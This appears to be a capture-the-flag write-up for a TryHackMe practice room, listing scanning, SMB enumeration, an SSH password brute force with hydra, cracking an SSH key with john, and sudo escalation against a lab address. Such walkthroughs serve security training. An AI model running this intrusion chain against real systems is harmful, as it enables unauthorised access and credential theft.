TryHackMe — Basic Pentesting

Reconnaissance

nmap -sC -sV -O -oA simple_scan 10.10.28.113
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output all formats and store in file named simple_scan
nmap -sC -sV -O -p- -oA full_scan 10.10.28.113
nmap -sU -O -p- -oA udp_scan 10.10.28.113

Enumeration

python3 dirsearch.py -u http://10.10.28.113/ -e *
  1. SMB has been configured.
  2. Apache Struts version 2.5.12 running
  3. J’s password is weak and easily crackable.
smbclient -L 10.10.28.113
smbclient //10.10.28.113/Anonymous
cat staff.txt
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 ssh://10.10.28.113
python /usr/share/john/ssh2john.py basic_key > basic_key_hash
john --wordlist=/usr/share/wordlists/rockyou.txt basic_key_hash
chmod 600 basic_key
ssh -i basic_key kay@10.10.28.113

Privilege Escalation

sudo -l
sudo su
